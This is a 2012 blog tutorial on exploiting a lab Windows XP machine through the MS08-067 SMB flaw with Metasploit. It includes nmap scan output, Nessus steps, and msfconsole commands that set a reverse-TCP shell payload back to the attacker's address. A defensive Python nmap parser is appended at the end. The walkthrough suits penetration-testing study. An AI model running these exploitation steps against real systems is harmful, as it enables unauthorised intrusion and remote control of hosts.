Monday, 10 September 2012

Exploiting Windows XP using Metasploit via the SMB Service

Posted at 19:28
What is Metasploit?
Metasploit Framework is the best known and most advanced exploitation toolkit. Metasploit is written in the Ruby programming language and is modular, which makes it easy for a penetration tester with reasonable programming skills to extend it or develop custom plugins and tools. Metasploit provides CLI, console and GUI interfaces.
How to do that?
  1. Information Gathering
    We need to collect information about the target, in this example Windows XP SP3. I will scan the target using Nmap.
    Scanning for live hosts
    root@bt# nmap -v -sn 172.16.227.1/24
    result:
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-11 21:27 WIT
    Initiating ARP Ping Scan at 21:27
    Scanning 172.16.227.0 [1 port]
    Completed ARP Ping Scan at 21:27, 0.44s elapsed (1 total hosts)
    Nmap scan report for 172.16.227.0 [host down]
    Initiating Parallel DNS resolution of 1 host. at 21:27
    Completed Parallel DNS resolution of 1 host. at 21:27, 0.51s elapsed
    Nmap scan report for 172.16.227.1
    Host is up.
    Initiating ARP Ping Scan at 21:27
    Scanning 254 hosts [1 port/host]
    Completed ARP Ping Scan at 21:27, 5.46s elapsed (254 total hosts)
    Initiating Parallel DNS resolution of 254 hosts. at 21:27
    Completed Parallel DNS resolution of 254 hosts. at 21:27, 0.27s elapsed
    Nmap scan report for 172.16.227.2 [host down]
    Nmap scan report for 172.16.227.3 [host down]
    Nmap scan report for 172.16.227.4 [host down]
    Nmap scan report for 172.16.227.5 [host down]
    .......
    Nmap scan report for 172.16.227.127 [host down]
    Nmap scan report for 172.16.227.128
    Host is up (0.0037s latency).
    MAC Address: 00:50:56:3C:FE:7E (VMware)
    Nmap scan report for 172.16.227.129 [host down]
    Host is up (0.00014s latency).
    MAC Address: 00:50:56:F9:40:9A (VMware)
    Nmap scan report for 172.16.227.255 [host down]
    Read data files from: /usr/local/bin/../share/nmap
    Nmap done: 256 IP addresses (3 hosts up) scanned in 6.90 seconds
               Raw packets sent: 508 (14.224KB) | Rcvd: 2 (56B)

    Scanning the host for service information
    root@bt# nmap -sS -A 172.16.227.128
    result:
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-11 22:43 WIT
    Nmap scan report for 172.16.227.128
    Host is up (0.00098s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE         VERSION
    135/tcp  open  msrpc           Microsoft Windows RPC
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
    1111/tcp open  lmsocialserver?
    MAC Address: 00:50:56:3C:FE:7E (VMware)
    Device type: general purpose
    Running: Microsoft Windows 2000|XP|2003
    OS CPE: cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::- cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
    OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
    Network Distance: 1 hop
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_nbstat: NetBIOS name: FATEH-100, NetBIOS user: , NetBIOS MAC: 00:50:56:3c:fe:7e (VMware)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery: 
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   Computer name: fateh-100
    |   NetBIOS computer name: FATEH-100
    |   Workgroup: FATEHNET
    |_  System time: 2012-09-11 22:43:55 UTC+7
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.98 ms 172.16.227.128
    
  2. Service Enumeration
    Result from the information gathering step:
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
  3. Vulnerability Assessment
    Now I will use Nessus for the vulnerability assessment.
    Run the Nessus service:
    root@bt# /etc/init.d/nessusd start
    Open the address http://bt:8834
    Go to the "scan" menu
    Add a scan and fill in the target.

    Result:

    Now we can see that port 445 is used by the SMB service, so we need to search for an SMB server exploit.
  4. Exploitation
    Open Metasploit by running this command:
    root@bt# msfconsole
    Search for SMB exploits using the smb keyword:
    search smb
    Use the SMB exploit:
    use exploit/windows/smb/ms08_067_netapi
    show options
    Set your target's IP address as RHOST:
    set RHOST 172.16.227.128
    show payloads
    Then set the payload:
    set PAYLOAD windows/shell/reverse_tcp_allports
    Now set our own IP address as LHOST:
    set LHOST 172.16.227.1
    Finally, run the exploit command:
    exploit
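As an added example (not part of the original post), a small Python parser for the nmap -sS -A report format shown in step 1 that flags hosts exposing 445/tcp whose OS fingerprint names Windows 2000, XP or Server 2003, so a defender can inventory unsupported SMB hosts for patching or network isolation. The scan text below is constructed, and the second host is made up for contrast.

```python
import re

# Constructed sample in the nmap -sS -A report format the post shows; hosts and OS strings are made up.
SAMPLE_SCAN = """\
Nmap scan report for 172.16.227.128
Host is up (0.00098s latency).
PORT     STATE SERVICE         VERSION
445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2

Nmap scan report for 172.16.227.200
Host is up (0.0010s latency).
PORT     STATE SERVICE         VERSION
445/tcp  open  microsoft-ds    Windows 10 Pro 19041 microsoft-ds
OS details: Microsoft Windows 10
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\S+)\s+(\S+)")
OS_RE = re.compile(r"^OS details: (.*)")
# OS families named in the post's fingerprint; all are long past end of support.
LEGACY = ("Windows 2000", "Windows XP", "Windows Server 2003")

def parse_nmap(text):
    """Map each reported host to its {port: state} table and its OS details line."""
    hosts, cur = {}, None
    for line in map(str.strip, text.splitlines()):
        m = HOST_RE.match(line)
        if m:
            cur = hosts.setdefault(m.group(1), {"ports": {}, "os": ""})
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            cur["ports"][int(m.group(1))] = m.group(2)
            continue
        m = OS_RE.match(line)
        if m:
            cur["os"] = m.group(1)
    return hosts

def legacy_smb_hosts(text):
    """Hosts with 445/tcp open whose OS fingerprint is an unsupported Windows."""
    return sorted(
        host for host, info in parse_nmap(text).items()
        if info["ports"].get(445) == "open"
        and any(name in info["os"] for name in LEGACY)
    )
```

Feed the function the saved text of a real scan of your own network and the returned list is the set of hosts to prioritise for decommissioning or SMB firewalling.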

